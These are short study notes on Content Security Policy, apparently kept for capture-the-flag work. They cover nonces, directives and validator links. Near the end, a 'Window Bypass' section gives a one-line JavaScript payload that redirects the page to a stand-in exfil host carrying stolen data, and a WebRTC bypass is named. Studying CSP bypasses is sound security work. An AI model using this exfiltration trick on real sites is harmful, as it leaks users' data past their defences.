Content Security Policy - Documentation

Link to this headingContent Security Policy (CSP)

strong mitigation against cross-site scripting attacks

https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP
https://cspvalidator.org/#url=https://cspvalidator.org/
https://csp-evaluator.withgoogle.com/

Link to this headingNonce

This can remove the unsafe-inline part of the CSP value

Restricts usage of script tags without the nonce value

script-src 'nonce-rAnd0m';

Restricts usage of style tags without the nonce value

style-src 'nonce-rAnd0m';

Nonce for external scripts

Content-Security-Policy: default-src 'none';script-src 'nonce-rAnd0m' <script src="https://code.jquery.com/jquery-3.7.1.min.js" nonce="rAnd0m" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>

Link to this headingKeys

script-src:
style-src:
default-src:
img-src:
child-src:
foobar-src:
report-uri:

Link to this headingscript-src

https://developer.mozilla.org/en-US/docs/Web/HTML/Global_attributes/nonce

Nonce Value: Only script tags with the nonce value will run
Content-Security-Policy: script-src ‘nonce-8IBTHwOdqNKAWeKl7plt8g==’

Link to this headingSpecial Values

‘unsafe-inline’: allows the execution of unsafe in-page scripts and event handlers.

Link to this headingExfil Bypasses

https://web.archive.org/web/20240519115002/https://btidor.dev/content-security-policy

WebRTC Bypass:

Link to this headingWindow Bypass

If there is data you want to extract from a website you can still just use the js below

window.location = "http://exfil.com" + flag;

Link to this headingHTML Meta Tags

https://content-security-policy.com/examples/meta/